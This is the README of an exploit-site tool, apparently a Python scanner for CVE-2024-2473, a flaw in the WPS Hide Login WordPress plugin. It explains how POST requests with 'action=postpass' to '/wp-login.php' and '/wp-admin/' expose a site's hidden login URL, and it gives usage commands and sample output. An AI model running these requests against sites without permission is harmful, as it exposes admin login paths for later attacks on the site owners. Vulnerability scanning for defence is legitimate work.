Share
## https://sploitus.com/exploit?id=96AAF477-A24A-5306-BA39-AB012AC3863F
# CVE-2024-2473 โ€” WPS Hide Login Page Identifier

**A professional Python scanner to detect Login Page Disclosure in WordPress sites running WPS Hide Login โ‰ค 1.9.15.2**

![Python](https://img.shields.io/badge/Python-3.7%2B-blue?style=flat-square&logo=python)
![CVE](https://img.shields.io/badge/CVE-2024--2473-red?style=flat-square)
![CVSS](https://img.shields.io/badge/CVSS-5.3%20Medium-orange?style=flat-square)
![License](https://img.shields.io/badge/License-MIT-green?style=flat-square)
![Platform](https://img.shields.io/badge/Platform-Linux%20%7C%20macOS%20%7C%20Windows-lightgrey?style=flat-square)

*Coded by [Venexy](https://github.com/m4xsec)*



---

## Table of Contents

- [Overview](#overview)
- [Vulnerability Details](#vulnerability-details)
- [How It Works](#how-it-works)
- [Requirements](#requirements)
- [Installation](#installation)
- [Usage](#usage)
- [Output Example](#output-example)
- [Disclaimer](#disclaimer)
- [References](#references)

---

## Overview

**WPS Hide Login** is a popular WordPress plugin that allows administrators to change the default `/wp-login.php` URL to a custom, hidden path โ€” acting as security through obscurity.

This scanner detects **CVE-2024-2473**, a vulnerability where the `action=postpass` parameter can be supplied to bypass the plugin's protection mechanism entirely, exposing the hidden login page URL to unauthenticated attackers.

---

## Vulnerability Details

| Field            | Details                                                                 |
|------------------|-------------------------------------------------------------------------|
| **CVE ID**       | CVE-2024-2473                                                           |
| **Affected**     | WPS Hide Login plugin โ‰ค 1.9.15.2 for WordPress                         |
| **Severity**     | Medium                                                                  |
| **CVSS Score**   | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)                            |
| **CWE**          | CWE-200 โ€” Exposure of Sensitive Information                             |
| **EPSS Score**   | 0.10433 (93rd percentile)                                               |
| **Auth Required**| None                                                                    |
| **Vendor**       | WPServeur                                                               |
| **Remediation**  | Update plugin to version > 1.9.15.2                                     |

### Description

The WPS Hide Login plugin relocates the WordPress login page from the default `/wp-login.php` to a custom URL chosen by the administrator. However, in all versions up to and including **1.9.15.2**, supplying the `action=postpass` query parameter to either `/wp-login.php` or `/wp-admin/` bypasses this protection, revealing the hidden login form's actual action URL โ€” effectively exposing the secret login path to any unauthenticated attacker.

---

## How It Works

The scanner replicates the vulnerability's attack flow across three phases:

```
Phase 1  โ”€โ–บ  Confirm target is a WordPress installation
                  โ”‚
                  โ–ผ
Phase 2a โ”€โ–บ  POST /wp-login.php?action=postpass
             with body: action=lostpassword&post_password=test
             Check: HTTP 200 + lostpasswordform present + no wp-login.php in body
             Extract hidden login URL from form action attribute
                  โ”‚
Phase 2b โ”€โ–บ  POST /wp-admin/?action=postpass
             Check: HTTP 302 redirect to location containing reauth=1 or /login
                  โ”‚
                  โ–ผ
             Report hidden login URL if discovered
```

If **either Phase 2a or Phase 2b** matches, the target is flagged as **vulnerable**.

---

## Requirements

- Python **3.7** or higher
- [`requests`](https://pypi.org/project/requests/) library

---

## Installation

**1. Clone the repository**

```bash
git clone https://github.com/m4xsec/CVE-2024-2473.git
cd CVE-2024-2473
```

**2. Install dependencies**

```bash
pip install requests
```

> **Note:** On systems using Python virtual environments or Kali Linux, you may need:
> ```bash
> pip install requests --break-system-packages
> ```

---

## Usage

```
python CVE-2024-2473.py -u  [-t TIMEOUT]
```

### Arguments

| Argument             | Description                                      | Default |
|----------------------|--------------------------------------------------|---------|
| `-u`, `--url`        | Target WordPress base URL *(required)*           | โ€”       |
| `-t`, `--timeout`    | HTTP request timeout in seconds                  | `10`    |

### Examples

```bash
# Basic scan
python CVE-2024-2473.py -u https://example.com

# Scan with custom timeout
python CVE-2024-2473.py -u https://example.com --timeout 15

# Scan over HTTP
python CVE-2024-2473.py -u http://192.168.1.100
```

---

## Output Example

```
 ...

  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
  โ”‚  CVE-2024-2473  โ€ข  WPS Hide Login Page Identifier           โ”‚
  โ”‚  Coded by Venexy | https://github.com/m4xsec               โ”‚
  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

  ===============================================================
    TARGET    https://example.com
    TIME      2024-11-01 18:00:00
    TIMEOUT   10s
  ===============================================================

  [18:00:00] [*] Phase 1 | Fingerprinting WordPress installation ...
  [18:00:01] [+] WordPress confirmed โ€” https://example.com

  [18:00:01] [*] Phase 2 | Testing CVE-2024-2473 bypass vectors ...

  [18:00:01] [*] Vector A | POST /wp-login.php?action=postpass
             +- Status : 200   Result : MATCH

  [18:00:02] [*] Vector B | POST /wp-admin/?action=postpass
             +- Status : 302   Result : MATCH

  ###############################################################
  ##           VULNERABILITY CONFIRMED  --  CVE-2024-2473      ##
  ###############################################################

    Plugin          WPS Hide Login >  https://example.com/my-secret-admin-path/

  ====================================================
```

---

## Disclaimer

> **This tool is intended for authorized security testing and educational purposes only.**
>
> The author is not responsible for any misuse or damage caused by this tool. Always obtain explicit written permission from the target system owner before conducting any security assessment. Unauthorized scanning or exploitation of systems is illegal and unethical.
>
> Use responsibly.

---

## References

| Resource | Link |
|----------|------|
| NVD โ€” CVE-2024-2473 | https://nvd.nist.gov/vuln/detail/CVE-2024-2473 |
| Wordfence Advisory | https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wps-hide-login/wps-hide-login-19152-login-page-disclosure |
| WPS Hide Login Plugin | https://wordpress.org/plugins/wps-hide-login/ |
| CWE-200 | https://cwe.mitre.org/data/definitions/200.html |
| CVSS 3.1 Calculator | https://www.first.org/cvss/calculator/3.1 |

---



**Coded with โค๏ธ by [Venexy](https://github.com/m4xsec)**

If this tool helped you, consider giving the repository a โญ๐ŸŒŸ๐ŸŒŸ๐ŸŒŸ